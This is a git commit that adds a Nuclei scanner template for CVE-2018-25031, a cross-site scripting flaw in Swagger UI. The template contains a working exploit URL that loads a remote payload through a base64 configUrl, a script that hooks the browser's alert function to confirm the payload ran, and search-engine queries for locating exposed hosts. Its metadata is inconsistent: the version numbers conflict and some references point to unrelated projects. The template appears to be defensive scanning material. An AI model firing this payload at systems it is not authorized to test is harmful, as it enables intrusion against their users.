Merge pull request #8683 from projectdiscovery/CVE-2018-25031

Create CVE-2018-25031.yaml (Swagger UI < 3.38.0 - Cross-Site Scripting)
2023-12-06 10:51:38 +05:30 · 2023-12-06 10:51:38 +05:30 · 377241b155
parent 989d083f64 6647b37291
commit 377241b155
1 changed files with 72 additions and 0 deletions
--- a/headless/cves/2018/CVE-2018-25031.yaml
+++ b/headless/cves/2018/CVE-2018-25031.yaml
@ -0,0 +1,72 @@
+id: CVE-2018-25031
+
+info:
+  name: Swagger UI < 3.38.0 - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.
+  remediation: |
+    Update to the latest version of the Swagger UI (^4.13.0 or higher) to mitigate the vulnerability.
+  reference:
+    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-25031
+    - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-3506
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2018-25031
+    cwe-id: CWE-20
+    epss-score: 0.00138
+    epss-percentile: 0.49196
+    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    fofa-query: icon_hash="-1180440057"
+    shodan-query: http.component:"Swagger"
+    verified: true
+    vendor: smartbear
+    product: swagger_ui
+  tags: cve,cve2018,headless,swagger-ui,xss
+
+headless:
+  - steps:
+      - args:
+          url: '{{BaseURL}}/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Byb2plY3RkaXNjb3ZlcnkvbnVjbGVpLXRlbXBsYXRlcy9tYWluL2hlbHBlcnMvcGF5bG9hZHMvc3dhZ2dlci1wYXlsb2FkIgp9'
+        action: navigate
+
+      - action: waitload
+
+      - action: script
+        args:
+          code: |
+           () => {
+            window.originalAlert = window.alert;
+            window.alert = function(message) {
+              window.alertTriggered = true
+              }
+            }
+
+      - action: sleep
+
+      - action: script
+        name: alerts
+        args:
+          code: |
+            () => {
+             return window.alertTriggered
+            }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: alerts
+        words:
+          - "true"
+
+      - type: word
+        part: body
+        words:
+          - "swagger"
+        case-insensitive: true